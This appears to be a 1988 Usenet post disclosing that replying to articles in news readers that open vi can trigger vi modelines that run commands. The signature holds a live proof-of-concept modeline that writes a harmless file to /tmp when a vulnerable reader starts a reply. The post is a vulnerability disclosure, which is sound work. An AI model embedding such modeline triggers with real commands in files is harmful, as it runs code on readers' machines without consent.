Xref: utzoo news.sysadmin:1771 comp.unix.wizards:13068
Path: utzoo!attcan!uunet!rosevax!news
From: news@rosevax.Rosemount.COM (News administrator)
Newsgroups: news.sysadmin,comp.unix.wizards
Subject: Trojan horse possible with news readers
Message-ID: <6775@rosevax.Rosemount.COM>
Date: 1 Dec 88 21:44:34 GMT
Reply-To: merlyn@ernie.rosemount.com
Organization: Rosemount Inc., Eden Prairie, MN
Lines: 18

I don't know if this has been discussed before, but here goes...

Many news reading programs (rn, vnews, others?) allow you include the
original text when following-up or replying-to articles.  The
default editor is usually vi; some versions of vi will execute
commands if it sees a line (near the top or bottom of a file)
of the form <e><x><:><command><:>

To see if your setup is vunerable, start a (R)eply to
me, then abort it (I don't want your cards & letters).  If
you have the bug, a file called 'NEWSBUG' will appear in /tmp
on your system, containing "any command".  Caveat Editor.

I don't fix 'em, I just report 'em.

-----
Merlyn LeRoy
 ex:!sh -c 'echo any command'>/tmp/NEWSBUG: